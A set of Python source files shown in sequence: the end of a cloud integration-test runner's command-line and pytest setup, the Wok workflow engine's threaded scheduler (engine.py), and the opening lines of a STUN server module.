"-n", "--parallelism", help="Tests parallelism for every region.", default=TEST_DEFAULTS.get("parallelism")
)
parser.add_argument(
"--retry-on-failures",
help="Retry once more the failed tests after a delay of 60 seconds.",
action="store_true",
default=TEST_DEFAULTS.get("retry_on_failures"),
)
parser.add_argument(
"--dry-run",
help="Only show the list of tests that would run with specified options.",
action="store_true",
default=TEST_DEFAULTS.get("dry_run"),
)
parser.add_argument(
"--show-output",
help="Do not redirect tests stdout to file. Not recommended when running in multiple regions.",
action="store_true",
default=TEST_DEFAULTS.get("show_output"),
)
parser.add_argument(
"--sequential",
help="Run tests in a single process. When not specified tests will run concurrently in all regions.",
action="store_true",
default=TEST_DEFAULTS.get("sequential"),
)
parser.add_argument(
"--reports",
help="create tests report files. junitxml creates a junit-xml style report file. html creates an html "
"style report file. json creates a summary with details for each dimensions",
nargs="+",
choices=["html", "junitxml", "json"],
default=TEST_DEFAULTS.get("reports"),
)
parser.add_argument("--key-name", help="Key to use for EC2 instances", required=True)
parser.add_argument("--key-path", help="Path to the key to use for SSH connections", required=True, type=_is_file)
parser.add_argument(
"--output-dir", help="Directory where tests outputs are generated", default=TEST_DEFAULTS.get("output_dir")
)
parser.add_argument(
"--custom-node-url", help="URL to a custom node package.", default=TEST_DEFAULTS.get("custom_node_url")
)
parser.add_argument(
"--custom-cookbook-url",
help="URL to a custom cookbook package.",
default=TEST_DEFAULTS.get("custom_cookbook_url"),
)
parser.add_argument(
"--custom-template-url", help="URL to a custom cfn template.", default=TEST_DEFAULTS.get("custom_template_url")
)
parser.add_argument(
"--custom-awsbatch-template-url",
help="URL to a custom awsbatch cfn template.",
default=TEST_DEFAULTS.get("custom_awsbatch_template_url"),
)
parser.add_argument(
"--custom-awsbatchcli-url",
help="URL to a custom awsbatch cli package.",
default=TEST_DEFAULTS.get("custom_awsbatchcli_url"),
)
parser.add_argument(
"--custom-ami", help="custom AMI to use for all tests.", default=TEST_DEFAULTS.get("custom_ami")
)
parser.add_argument("--vpc-stack", help="Name of an existing vpc stack.", default=TEST_DEFAULTS.get("vpc_stack"))
parser.add_argument(
"--cluster", help="Use an existing cluster instead of creating one.", default=TEST_DEFAULTS.get("cluster")
)
parser.add_argument(
"--no-delete",
action="store_true",
help="Don't delete stacks after tests are complete.",
default=TEST_DEFAULTS.get("no_delete"),
)
return parser
def _is_file(value):
if not os.path.isfile(value):
raise argparse.ArgumentTypeError("'{0}' is not a valid key".format(value))
return value
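# Build the pytest argument list from the parsed options; regions, log file and output
# directory differ between regionalized and non-regionalized runs.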
def _get_pytest_args(args, regions, log_file, out_dir):
pytest_args = ["-s", "-vv", "-l", "--rootdir=./tests"]
# Show all tests durations
pytest_args.append("--durations=0")
# Run only tests with the given markers
pytest_args.append("-m")
pytest_args.append(" or ".join(args.features))
pytest_args.append("--regions")
pytest_args.extend(regions)
pytest_args.append("--instances")
pytest_args.extend(args.instances)
pytest_args.append("--oss")
pytest_args.extend(args.oss)
pytest_args.append("--schedulers")
pytest_args.extend(args.schedulers)
pytest_args.extend(["--tests-log-file", "{0}/{1}".format(args.output_dir, log_file)])
pytest_args.extend(["--output-dir", "{0}/{1}".format(args.output_dir, out_dir)])
pytest_args.extend(["--key-name", args.key_name])
pytest_args.extend(["--key-path", args.key_path])
if args.retry_on_failures:
# Rerun tests on failures for one more time after 60 seconds delay
pytest_args.extend(["--reruns", "1", "--reruns-delay", "60"])
if args.parallelism:
pytest_args.extend(["-n", args.parallelism])
if args.dry_run:
pytest_args.append("--collect-only")
if "junitxml" in args.reports or "json" in args.reports:
pytest_args.append("--junit-xml={0}/{1}/results.xml".format(args.output_dir, out_dir))
if "html" in args.reports:
pytest_args.append("--html={0}/{1}/results.html".format(args.output_dir, out_dir))
_set_custom_packages_args(args, pytest_args)
_set_custom_stack_args(args, pytest_args)
return pytest_args
def _set_custom_packages_args(args, pytest_args):
if args.custom_node_url:
pytest_args.extend(["--custom-node-package", args.custom_node_url])
if args.custom_cookbook_url:
pytest_args.extend(["--custom-chef-cookbook", args.custom_cookbook_url])
if args.custom_template_url:
pytest_args.extend(["--template-url", args.custom_template_url])
if args.custom_awsbatch_template_url:
pytest_args.extend(["--custom-awsbatch-template-url", args.custom_awsbatch_template_url])
if args.custom_awsbatchcli_url:
pytest_args.extend(["--custom-awsbatchcli-package", args.custom_awsbatchcli_url])
if args.custom_ami:
pytest_args.extend(["--custom-ami", args.custom_ami])
def _set_custom_stack_args(args, pytest_args):
if args.vpc_stack:
pytest_args.extend(["--vpc-stack", args.vpc_stack])
if args.cluster:
pytest_args.extend(["--cluster", args.cluster])
if args.no_delete:
pytest_args.append("--no-delete")
def _get_pytest_regionalized_args(region, args):
return _get_pytest_args(
args=args,
regions=[region],
log_file="{0}/{1}.log".format(LOGS_DIR, region),
out_dir="{0}/{1}".format(OUT_DIR, region),
)
def _get_pytest_non_regionalized_args(args):
return _get_pytest_args(
args=args, regions=args.regions, log_file="{0}/all_regions.log".format(LOGS_DIR), out_dir=OUT_DIR
)
def _run_test_in_region(region, args):
out_dir = "{base_dir}/{out_dir}/{region}".format(base_dir=args.output_dir, out_dir=OUT_DIR, region=region)
os.makedirs(out_dir, exist_ok=True)
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/pytest.out".format(out_dir), "w")
pytest_args_regionalized = _get_pytest_regionalized_args(region, args)
logger.info("Starting tests in region {0} with params {1}".format(region, pytest_args_regionalized))
pytest.main(pytest_args_regionalized)
def _make_logging_dirs(base_dir):
logs_dir = "{base_dir}/{logs_dir}".format(base_dir=base_dir, logs_dir=LOGS_DIR)
os.makedirs(logs_dir, exist_ok=True)
logger.info("Configured logs dir: {0}".format(logs_dir))
out_dir = "{base_dir}/{out_dir}".format(base_dir=base_dir, out_dir=OUT_DIR)
os.makedirs(out_dir, exist_ok=True)
logger.info("Configured tests output dir: {0}".format(out_dir))
def _run_parallel(args):
jobs = []
for region in args.regions:
p = multiprocessing.Process(target=_run_test_in_region, args=[region, args])
jobs.append(p)
p.start()
for job in jobs:
job.join()
def _run_sequential(args):
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/{1}/pytest.out".format(args.output_dir, OUT_DIR), "w")
pytest_args_non_regionalized = _get_pytest_non_regionalized_args(args)
logger.info("Starting tests with params {0}".format(pytest_args_non_regionalized))
pytest.main(pytest_args_non_regionalized)
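# Execution modes (summary of the helpers above): _run_parallel() forks one process per
# region, each running pytest for that region only and writing to
# <output_dir>/<OUT_DIR>/<region>/pytest.out, while _run_sequential() runs a single pytest
# session over all requested regions with one shared output file.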
def main():
"""Entrypoint for tests executor."""
args = _init_argparser().parse_args()
logger.info("Starting tests with parameters {0}".format(args))
_make_logging_dirs(args.output_dir)
if args.sequential:
_run_sequential(args)
else:
_run_parallel(args)
logger.info("All tests completed!")
reports_output_dir = "{base_dir}/{out_dir}".format(base_dir=args.output_dir, out_dir=OUT_DIR)
if "junitxml" in args.reports:
generate_junitxml_merged_report(reports_output_dir)
if "json" in args.reports:
logger.info("Generating tests report")
generate_json_report(reports_output_dir)
if __name__ == "__main__":
main()
|
engine.py
|
###############################################################################
#
# Copyright 2009-2011, Universitat Pompeu Fabra
#
# This file is part of Wok.
#
# Wok is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Wok is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import shutil
import StringIO
import time
from Queue import Queue, Empty
import threading
from multiprocessing import cpu_count
from sqlalchemy import func
from sqlalchemy.orm.exc import NoResultFound
from blinker import Signal
from wok import logger
from wok.config.data import Data
from wok.config.loader import ConfigLoader
from wok.core import runstates
from wok.core import events
from wok.core import errors
from wok.core.utils.sync import Synchronizable, synchronized
from wok.core.utils.atomic import AtomicCounter
from wok.core.utils.logsdb import LogsDb
from wok.core.utils.proctitle import set_thread_title
from wok.engine.projects import ProjectManager
from wok.platform.factory import create_platform
from wok.core.cmd import create_command_builder
from wok.jobs import JobSubmission
import db
from case import Case, SynchronizedCase
_DT_FORMAT = "%Y-%m-%d %H:%M:%S"
class WokEngine(Synchronizable):
"""
The Wok engine manages the execution of workflow cases.
Each case represents a workflow loaded with a certain configuration.
"""
def __init__(self, conf, conf_base_path=None):
Synchronizable.__init__(self)
self._global_conf = conf
self._expanded_global_conf = conf.clone().expand_vars()
self._conf = self._expanded_global_conf.get("wok", default=Data.element)
self._conf_base_path = conf_base_path
self._log = logger.get_logger("wok.engine")
self._work_path = self._conf.get("work_path", os.path.join(os.getcwd(), "wok-files"))
if not os.path.exists(self._work_path):
os.makedirs(self._work_path)
self._cases = []
self._cases_by_name = {}
self._stopping_cases = {}
#self._lock = Lock()
self._cvar = threading.Condition(self._lock)
self._run_thread = None
self._running = False
self._finished_event = threading.Event()
self._job_task_map = {}
self._logs_threads = []
self._logs_queue = Queue()
self._join_thread = None
self._join_queue = Queue()
self._num_log_threads = self._conf.get("num_log_threads", cpu_count())
self._max_alive_threads = 2 + self._num_log_threads
self._num_alive_threads = AtomicCounter()
self._started = False
self._notified = False
recover = self._conf.get("recover", False)
db_path = os.path.join(self._work_path, "engine.db")
if not recover and os.path.exists(db_path):
os.remove(db_path)
self._db = db.create_engine("sqlite:///{}".format(db_path), drop_tables=not recover)
# platforms
self._platforms = self._create_platforms()
self._platforms_by_name = {}
for platform in self._platforms:
self._platforms_by_name[platform.name] = platform
default_platform_name = self._conf.get("default_platform", self._platforms[0].name)
if default_platform_name not in self._platforms_by_name:
self._log.warn("Platform '{}' not found, using '{}' as the default platform".format(
default_platform_name, self._platforms[0].name))
default_platform_name = self._platforms[0].name
self._default_platform = self._platforms_by_name[default_platform_name]
# projects
if conf_base_path is None:
conf_base_path = os.getcwd()
projects_conf = self._global_conf.get("wok.projects")
self._projects = ProjectManager(projects_conf, base_path=conf_base_path)
self._projects.initialize()
# signals
self.case_created = Signal()
self.case_state_changed = Signal()
self.case_started = Signal()
self.case_finished = Signal()
self.case_removed = Signal()
# recovering
if recover:
self.__recover_from_db()
def _create_platforms(self):
"""
Creates the platforms according to the configuration.
:return: list of Platform
"""
platform_confs = self._conf.get("platforms")
if platform_confs is None:
platform_confs = Data.list()
elif not Data.is_list(platform_confs):
self._log.error("Wrong configuration type for 'platforms': {}".format(platform_confs))
platform_confs = Data.list()
if len(platform_confs) == 0:
platform_confs += [Data.element(dict(type="local"))]
platforms = []
names = {}
for pidx, platform_conf in enumerate(platform_confs):
if isinstance(platform_conf, basestring):
if not os.path.isabs(platform_conf) and self._conf_base_path is not None:
platform_conf = os.path.join(self._conf_base_path, platform_conf)
platform_conf = ConfigLoader(platform_conf).load()
if not Data.is_element(platform_conf):
raise errors.ConfigTypeError("wok.platforms[{}]: {}".format(pidx, platform_conf))
ptype = platform_conf.get("type", "local")
name = platform_conf.get("name", ptype)
if name in names:
name = "{}-{}".format(name, names[name])
names[name] += 1
else:
names[name] = 2
platform_conf["name"] = name
if "work_path" not in platform_conf:
platform_conf["work_path"] = os.path.join(self._work_path, "platform_{}".format(name))
self._log.info("Creating '{}' platform ...".format(name))
self._log.debug("Platform configuration: {}".format(repr(platform_conf)))
platforms += [create_platform(ptype, platform_conf)]
return platforms
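# Illustrative sketch (not part of the original code): a minimal "platforms" configuration
# that _create_platforms() would accept, shown as the equivalent Python data. Only the keys
# read above (type, name, work_path) are used; the values are hypothetical, and entries may
# also be given as paths to platform configuration files.
#
#   "platforms": [
#       {"type": "local", "name": "local", "work_path": "/tmp/wok/platform_local"}
#   ]
#
# With no configuration at all, a single default platform of type "local" is created.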
def _on_job_update(self, event, **kwargs):
self.notify()
def __recover_from_db(self):
raise NotImplementedError()
def __queue_adaptative_get(self, queue, start_timeout=1.0, max_timeout=6.0):
timeout = start_timeout
msg = None
while self._running and msg is None:
try:
msg = queue.get(timeout=timeout)
except Empty:
if timeout < max_timeout:
timeout += 0.5
except:
break
return msg
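# Note on the adaptive get above: the queue is polled with a timeout that starts at
# start_timeout and grows by 0.5s on every empty poll, capped at max_timeout
# (1.0 -> 1.5 -> ... -> 6.0 by default), so an idle engine wakes up progressively
# less often while still reacting quickly when messages arrive.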
# Not used anywhere
def __queue_batch_get(self, queue, start_timeout=1, max_timeout=5):
timeout = start_timeout
msg_batch = []
while self._running and len(msg_batch) == 0:
try:
msg_batch += [queue.get(timeout=timeout)]
while not queue.empty():
msg_batch += [queue.get(timeout=timeout)]
except Empty:
if timeout < max_timeout:
timeout += 1
return msg_batch
def __job_submissions(self, session, platform):
#FIXME Be fair with priorities between different cases ?
query = session.query(db.WorkItem)\
.filter(db.WorkItem.state == runstates.READY)\
.filter(db.WorkItem.platform == platform.name)\
.order_by(db.WorkItem.priority)
for workitem in query:
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
js = JobSubmission(
case=case,
task=task,
workitem_id=workitem.id,
job_name=workitem.cname,
task_conf=task.conf,
priority=workitem.priority)
execution = task.execution
cmd_builder = create_command_builder(execution.mode)
js.script, js.env = cmd_builder.prepare(case, task, workitem.index)
yield js
def __remove_case(self, session, case):
"""
Definitively remove a case. The engine should be locked and no case jobs running.
"""
self._log.info("Dropping case {} ...".format(case.name))
del self._cases_by_name[case.name]
self._cases.remove(case)
# remove engine db objects and finalize case
self._log.debug(" * database ...")
case.remove(session)
self._lock.release()
try:
#TODO clean the job manager output files
try:
self._log.debug(" * logs ...")
logs_path = os.path.join(self._work_path, "logs", case.name)
shutil.rmtree(logs_path)
except:
self._log.exception("Error removing logs at {}".format(logs_path))
# remove data
self._log.debug(" * data ...")
for platform in case.platforms:
platform.data.remove_case(case.name)
# remove storage
self._log.debug(" * storage ...")
for platform in case.platforms:
platform.storage.delete_container(case.name)
# emit signal
self.case_removed.send(case)
finally:
self._lock.acquire()
# threads ----------------------
@synchronized
def _run(self):
set_thread_title()
num_exc = 0
self._running = True
self._num_alive_threads += 1
# Start the logs threads
for i in range(self._num_log_threads):
t = threading.Thread(target=self._logs, args=(i, ), name="wok-engine-logs-%d" % i)
self._logs_threads += [t]
t.start()
# Start the join thread
self._join_thread = threading.Thread(target=self._join, name="wok-engine-join")
self._join_thread.start()
_log = logger.get_logger("wok.engine.run")
_log.debug("Engine run thread ready")
while self._running:
session = db.Session()
try:
#_log.debug("Scheduling new tasks ...")
set_thread_title("scheduling")
updated_tasks = set()
# schedule tasks ready to be executed and save new workitems into the db
for case in self._cases:
tasks = case.schedule(session)
updated_tasks.update(tasks)
session.commit()
# submit workitems ready to be executed
for platform in self._platforms:
job_submissions = self.__job_submissions(session, platform)
for js, job_id, job_state in platform.submit(job_submissions):
workitem = session.query(db.WorkItem).filter(db.WorkItem.id == js.workitem_id).one()
workitem.job_id = job_id
workitem.state = job_state
js.task.dirty = True
session.commit()
updated_tasks.add(js.task)
session.close()
session = None
#_log.debug("Waiting for events ...")
set_thread_title("waiting")
while len(updated_tasks) == 0 and not self._notified and self._running:
self._cvar.wait(1)
self._notified = False
if not self._running:
break
session = db.Session() # there is a session.close() in the finished block
#_log.debug("Stopping jobs for aborting instances ...")
set_thread_title("working")
# check stopping instances
for case in self._cases:
if (case.state == runstates.ABORTING or case.removed) and case not in self._stopping_cases:
num_job_ids = session.query(db.WorkItem.job_id).filter(db.WorkItem.case_id == case.id)\
.filter(~db.WorkItem.state.in_(runstates.TERMINAL_STATES)).count()
if num_job_ids == 0:
if case.state == runstates.ABORTING:
_log.debug("Aborted case {} with no running jobs".format(case.name))
dbcase = session.query(db.Case).filter(db.Case.id == case.id).first()
dbcase.state = case.state = runstates.ABORTED
session.commit()
else:
_log.debug("Stopped case {} with no running jobs".format(case.name))
if case.removed:
_log.debug("Removing case {} with no running jobs".format(case.name))
self.__remove_case(session, case)
session.commit()
else:
_log.info("Stopping {} jobs for case {} ...".format(num_job_ids, case.name))
self._stopping_cases[case] = set()
for platform in self._platforms:
job_ids = [int(r[0]) for r in session.query(db.WorkItem.job_id)
.filter(db.WorkItem.case_id == case.id)\
.filter(db.WorkItem.platform == platform.name)\
.filter(~db.WorkItem.state.in_(runstates.TERMINAL_STATES))]
self._stopping_cases[case].update(job_ids)
platform.jobs.abort(job_ids)
#_log.debug("Checking job state changes ...")
# detect workitems which state has changed
for platform in self._platforms:
for job_id, state in platform.jobs.state():
try:
workitem = session.query(db.WorkItem).filter(db.WorkItem.job_id == job_id).one()
except NoResultFound:
_log.warn("No work-item available for the job {0} while retrieving state".format(job_id))
platform.jobs.abort([job_id])
platform.jobs.join(job_id)
continue
if workitem.state != state:
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
task.dirty = True
workitem.state = state
workitem.substate = runstates.LOGS_RETRIEVAL
session.commit()
updated_tasks.add(task)
# if workitem has finished, queue it for logs retrieval
if state in runstates.TERMINAL_STATES:
self._logs_queue.put((workitem.id, job_id))
_log.debug("[{}] Work-Item {} changed state to {}".format(case.name, workitem.cname, state))
#_log.debug("Updating components state ...")
# update affected components state
updated_cases = set([task.case for task in updated_tasks])
for case in updated_cases:
case.update_states(session)
case.update_count_by_state(session)
case.clean_components(session)
session.commit()
if case.state == runstates.RUNNING:
self._lock.release()
try:
self.case_started.send(case)
finally:
self._lock.acquire()
for task in updated_tasks:
case = task.case
#_log.debug("[{}] Component {} updated state to {} ...".format(
# component.case.name, component.cname, component.state))
count = task.workitem_count_by_state
sb = ["[{}] {} ({})".format(case.name, task.cname, task.state.title)]
sep = " "
for state in runstates.STATES:
if state in count:
sb += [sep, "{}={}".format(state.symbol, count[state])]
if sep == " ":
sep = ", "
if task.state == runstates.FINISHED and task.state in count:
elapsed = str(task.elapsed)
elapsed = elapsed.split(".")[0]
sb += [" ", "<{}>".format(elapsed)]
self._log.info("".join(sb))
except BaseException as ex:
num_exc += 1
_log.warn("Exception in run thread ({}): {}".format(num_exc, str(ex)))
#if num_exc > 3:
# raise
#else:
from traceback import format_exc
_log.debug(format_exc())
try:
if session is not None:
session.rollback()
except Exception as ex:
_log.warn("Session rollback failed")
_log.exception(ex)
finally:
try:
if session is not None:
session.close()
except Exception as ex:
_log.warn("Session close failed")
_log.exception(ex)
session = None
set_thread_title("finishing")
try:
# print cases state before leaving the thread
#for case in self._cases:
# _log.debug("Case state:\n" + repr(case))
for t in self._logs_threads:
t.join()
self._lock.release()
self._join_thread.join()
self._lock.acquire()
_log.debug("Engine run thread finished")
except Exception as ex:
_log.exception(ex)
self._running = False
self._num_alive_threads -= 1
def _logs(self, index):
"Log retrieval thread"
set_thread_title()
self._num_alive_threads += 1
_log = logger.get_logger("wok.engine.logs-{}".format(index))
_log.debug("Engine logs thread ready")
num_exc = 0
while self._running:
set_thread_title("waiting")
# get the next task to retrieve the logs
job_info = self.__queue_adaptative_get(self._logs_queue)
if job_info is None:
continue
workitem_id, job_id = job_info
session = db.Session()
task = None
try:
workitem = session.query(db.WorkItem).filter(db.WorkItem.id == workitem_id).one()
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
set_thread_title(workitem.cname)
_log.debug("[{}] Reading logs for work-item {} ...".format(case.name, workitem.cname))
output = task.platform.jobs.output(job_id)
if output is None:
output = StringIO.StringIO()
path = os.path.join(self._work_path, "logs", case.name, task.cname)
if not os.path.isdir(path):
try:
os.makedirs(path)
except:
if not os.path.isdir(path):
raise
path = os.path.join(path, "{:08}.db".format(workitem.index))
if os.path.isfile(path):
os.remove(path)
logs_db = LogsDb(path)
logs_db.open()
logs_db.add(case.name, task.cname, workitem.index, output)
logs_db.close()
_log.debug("[{}] Done with logs of work-item {}".format(case.name, workitem.cname))
except BaseException as ex:
num_exc += 1
session.rollback()
_log.info("Exception in logs thread ({}): {}".format(num_exc, str(ex)))
from traceback import format_exc
_log.debug(format_exc())
finally:
workitem.substate = runstates.JOINING
self._join_queue.put(job_info)
session.commit()
session.close()
self._num_alive_threads -= 1
_log.debug("Engine logs thread finished")
def _join(self):
"Joiner thread"
set_thread_title()
self._num_alive_threads += 1
_log = logger.get_logger("wok.engine.join")
_log.debug("Engine join thread ready")
session = None
num_exc = 0
while self._running:
try:
set_thread_title("waiting")
job_info = self.__queue_adaptative_get(self._join_queue)
if job_info is None:
continue
workitem_id, job_id = job_info
with self._lock:
session = db.Session()
workitem = session.query(db.WorkItem).filter(db.WorkItem.id == workitem_id).one()
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
set_thread_title(task.cname)
#_log.debug("Joining work-item %s ..." % task.cname)
jr = task.platform.jobs.join(job_id)
wr = Data.element(dict(
hostname=jr.hostname,
created=jr.created.strftime(_DT_FORMAT) if jr.created is not None else None,
started=jr.started.strftime(_DT_FORMAT) if jr.started is not None else None,
finished=jr.finished.strftime(_DT_FORMAT) if jr.finished is not None else None,
exitcode=jr.exitcode.code if jr.exitcode is not None else None))
r = task.platform.data.load_workitem_result(case.name, task.cname, workitem.index)
if r is not None:
if r.exception is not None:
wr["exception"] = r.exception
if r.trace is not None:
wr["trace"] = r.trace
workitem.substate = None
workitem.result = wr
case.num_active_workitems -= 1
session.commit()
# check if there are still more work-items
num_workitems = session.query(func.count(db.WorkItem.id)).filter(
~db.WorkItem.state.in_(runstates.TERMINAL_STATES)).scalar()
if self._single_run and num_workitems == 0:
stop_engine = True
for case in self._cases:
stop_engine = stop_engine and (case.state in runstates.TERMINAL_STATES)
#self._running = not stop_engine
if stop_engine:
self._finished_event.set()
_log.debug("[{}] Joined work-item {}".format(case.name, workitem.cname))
# check stopping instances
if case in self._stopping_cases:
job_ids = self._stopping_cases[case]
if job_id in job_ids:
job_ids.remove(job_id)
if len(job_ids) == 0:
del self._stopping_cases[case]
if case.state == runstates.ABORTING:
workitem.case.state = case.state = runstates.ABORTED
session.commit()
if case.removed:
self.__remove_case(session, case)
session.commit()
else:
_log.debug("Still waiting for {} jobs to stop".format(len(job_ids)))
if case.state in runstates.TERMINAL_STATES and case.num_active_workitems == 0:
_log.info("[{}] Case {}. Total time: {}".format(case.name, case.state.title, str(case.elapsed)))
self._lock.release()
try:
self.case_finished.send(case)
finally:
self._lock.acquire()
except BaseException as ex:
num_exc += 1
_log.warn("Exception in join thread ({}): {}".format(num_exc, str(ex)))
from traceback import format_exc
_log.debug(format_exc())
try:
if session is not None:
session.rollback()
except Exception as ex:
_log.warn("Session rollback failed")
_log.exception(ex)
finally:
try:
if session is not None:
session.close()
except Exception as ex:
_log.warn("Session close failed")
_log.exception(ex)
self._num_alive_threads -= 1
_log.debug("Engine join thread finished")
# API -----------------------------------
@property
def conf(self):
return self._conf
@property
def work_path(self):
return self._work_path
@property
def projects(self):
return self._projects
def platform(self, name):
return self._platforms_by_name.get(name)
@property
def default_platform(self):
return self._default_platform
@synchronized
def start(self, wait=True, single_run=False):
self._log.info("Starting engine ...")
started_platforms = []
try:
for platform in self._platforms:
started_platforms += [platform]
platform.start()
platform.callbacks.add(events.JOB_UPDATE, self._on_job_update)
except BaseException as ex:
self._log.error(str(ex))
for platform in started_platforms:
platform.close()
raise
#for project in self._projects:
# self._default_platform.sync_project(project)
self._single_run = single_run
self._run_thread = threading.Thread(target=self._run, name="wok-engine-run")
self._run_thread.start()
self._lock.release()
try:
try:
self._num_alive_threads.wait_condition(lambda value: value < self._max_alive_threads)
self._started = True
self._log.info("Engine started")
except KeyboardInterrupt:
wait = False
self._log.warn("Ctrl-C pressed ...")
except Exception as e:
wait = False
self._log.error("Exception while waiting for the engine to start")
self._log.exception(e)
if wait:
self.wait()
finally:
self._lock.acquire()
def wait(self):
self._log.info("Waiting for the engine to finish ...")
try:
finished = self._finished_event.wait(1)
while not finished:
finished = self._finished_event.wait(1)
except KeyboardInterrupt:
self._log.warn("Ctrl-C pressed ...")
except Exception as e:
self._log.error("Exception while waiting for the engine to finish, stopping the engine ...")
self._log.exception(e)
self._log.info("Finished waiting for the engine ...")
def _stop_threads(self):
self._log.info("Stopping threads ...")
if self._run_thread is not None:
with self._lock:
self._running = False
self._cvar.notify()
while self._run_thread.isAlive():
try:
self._run_thread.join(1)
except KeyboardInterrupt:
self._log.warn("Ctrl-C pressed, killing the process ...")
import signal
os.kill(os.getpid(), signal.SIGTERM)
except Exception as e:
self._log.error("Exception while waiting for threads to finish ...")
self._log.exception(e)
self._log.warn("killing the process ...")
exit(-1)
import signal
os.kill(os.getpid(), signal.SIGTERM)
self._run_thread = None
self._log.info("All threads finished ...")
@synchronized
def stop(self):
self._log.info("Stopping the engine ...")
self._finished_event.set()
self._lock.release()
try:
if self._run_thread is not None:
self._stop_threads()
for platform in self._platforms:
platform.close()
finally:
self._lock.acquire()
self._started = False
self._log.info("Engine stopped")
def running(self):
return self._started
def notify(self, lock=True):
if lock:
self._lock.acquire()
self._notified = True
self._cvar.notify()
if lock:
self._lock.release()
@synchronized
def cases(self):
instances = []
for inst in self._cases:
instances += [SynchronizedCase(self, inst)]
return instances
@synchronized
def case(self, name):
inst = self._cases_by_name.get(name)
if inst is None:
return None
return SynchronizedCase(self, inst)
@synchronized
def exists_case(self, name):
return name in self._cases_by_name
@synchronized
def create_case(self, case_name, conf_builder, project_name, flow_name, container_name):
"Creates a new workflow case"
session = db.Session()
if session.query(db.Case).filter(db.Case.name==case_name).count() > 0:
raise Exception("A case with this name already exists: {}".format(case_name))
flow_uri = "{}:{}".format(project_name, flow_name)
self._log.info("Creating case {} from {} ...".format(case_name, flow_uri))
try:
try:
flow = self.projects.load_flow(flow_uri)
project = flow.project
except:
self._log.error("Error while loading the workflow from {}".format(flow_uri))
raise
for platform in self._platforms:
try:
platform.data.remove_case(case_name)
platform.data.create_case(case_name)
except:
self._log.error("Error while initializing data for case {}".format(case_name))
raise
try:
case = Case(case_name, conf_builder, project, flow, container_name, engine=self)
self._cases += [case]
self._cases_by_name[case_name] = case
case.persist(session)
session.flush()
self.notify(lock=False)
except:
self._log.error("Error while creating case {} for the workflow {} with configuration {}".format(
case_name, flow_uri, conf_builder.get_conf()))
raise
except:
session.rollback()
#self._log.error("Error while creating case {} for the workflow {} with configuration {}".format(
# case_name, flow_uri, conf_builder.get_conf()))
raise
session.close()
self._log.debug("\n" + repr(case))
self._lock.release()
try:
self.case_created.send(case)
finally:
self._lock.acquire()
return SynchronizedCase(self, case)
@synchronized
def remove_case(self, name):
if name in self._cases_by_name:
session = db.Session()
case = self._cases_by_name[name]
dbcase = session.query(db.Case).filter(db.Case.id == case.id).first()
dbcase.removed = case.removed = True
if case.state not in runstates.TERMINAL_STATES + [runstates.READY]:
dbcase.state = case.state = runstates.ABORTING
num_retries = 3
while num_retries > 0:
try:
session.commit()
self.notify(lock=False)
self._log.debug("Case {} marked for removal".format(case.name))
except BaseException as ex:
num_retries -= 1
_log.info("Exception in remove_case: {}".format(str(ex)))
if num_retries > 0:
_log.info("Remaining retries = {}".format(num_retries))
import time
time.sleep(1)
else:
from traceback import format_exc
self._log.debug(format_exc())
session.rollback()
finally:
session.close()
else:
self._log.error("Trying to remove a non existing case: {}".format(name))
'''
try:
# retrieve job id's
session = db.Session()
job_ids = session.query(db.WorkItem.job_id)\
.filter(db.WorkItem.case_id == self.id)\
.filter(db.WorkItem.job_id != None).all()
# abort running jobs
case.platform.jobs.abort(job_ids)
except:
self._log.error("Remove case {}: Error aborting jobs.".format(name))
#TODO we need to know when the jobs finish to clean the engine log dbs and the job manager output files
try:
# remove data
case.platform.data.remove_case(case.name)
except:
self._log.error("Remove case {}: Error removing data.".format(name))
# remove engine db objects and finalize case
#case.remove(session)
#TODO we need to know when the jobs finish to clean the engine db objects and finalize the case
session.close()
'''
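# Hedged usage sketch, not part of the original module: how an embedding application might
# drive the engine. conf_path and the single_run flag are illustrative; the configuration
# format is whatever ConfigLoader accepts.
def _example_engine_usage(conf_path):
    conf = ConfigLoader(conf_path).load()
    engine = WokEngine(conf, conf_base_path=os.path.dirname(conf_path))
    try:
        # start() spawns the run/logs/join threads; wait=True blocks until the
        # engine signals completion through its internal finished event.
        engine.start(wait=True, single_run=True)
    finally:
        engine.stop()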
|
stun_server.py
|
import socket
import sys
import os
import traceback
import struct
import threading
from threading import Thread
import time
from datetime import date, timedelta
import datetime
import json
import buffered_message
import psycopg2
from connection_state import ConnectionState
import tcp
import sqlalchemy
from sqlalchemy import func
import stun_alchemy
from stun_alchemy import Stun_User
from Crypto.PublicKey import RSA
from Crypto import Random
import re
orig_path = os.getcwd()
os.chdir("../")
sys.path.insert(0, os.getcwd())
os.chdir(orig_path)
from auth import auth
import hashlib
# *************
# EXAMPLE USAGE
# *************
"""
import os
import socket
import tcp
import udp
import stun_server
import yaml
def x(data):
print yaml.dump({"data":data}, default_flow_style=False)
start_listening = True
buffer_size = 1024
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 30788
database_config_file = "%s/database_conf.json" % os.path.dirname(os.path.realpath("database_conf.json")) # "%s/database_conf.json" % os.path.dirname(os.path.realpath(__file__))
server = stun_server.STUN_Server(start_listening, buffer_size, local_ip, local_port, database_config_file)
if __name__ == "__main__":
# Keep this process running until Enter is pressed
print "Press Enter to quit..."
try:
sys.stdin.readline()
except:
pass
server.shutdown()
"""
# pk.exportkey("OpenSSH")
# comm = udp.UDP_Communications(True)
# comm.send_message([5,6,7], True)
# comm.pop_message(True)
class STUN_Server:
def __init__(self,
start_listen_thread=False,
buffer_size=1024,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=30788,
database_config_file=None):
self.local_ip = local_ip
self.local_port = local_port
self.buffer_size = buffer_size
self.database_config_file = database_config_file
self.thread_sleep_duration = 0.1
self.metainfo_update_thread_sleep_duration = 0.5
self.peer_timeout = 20 # measured in seconds
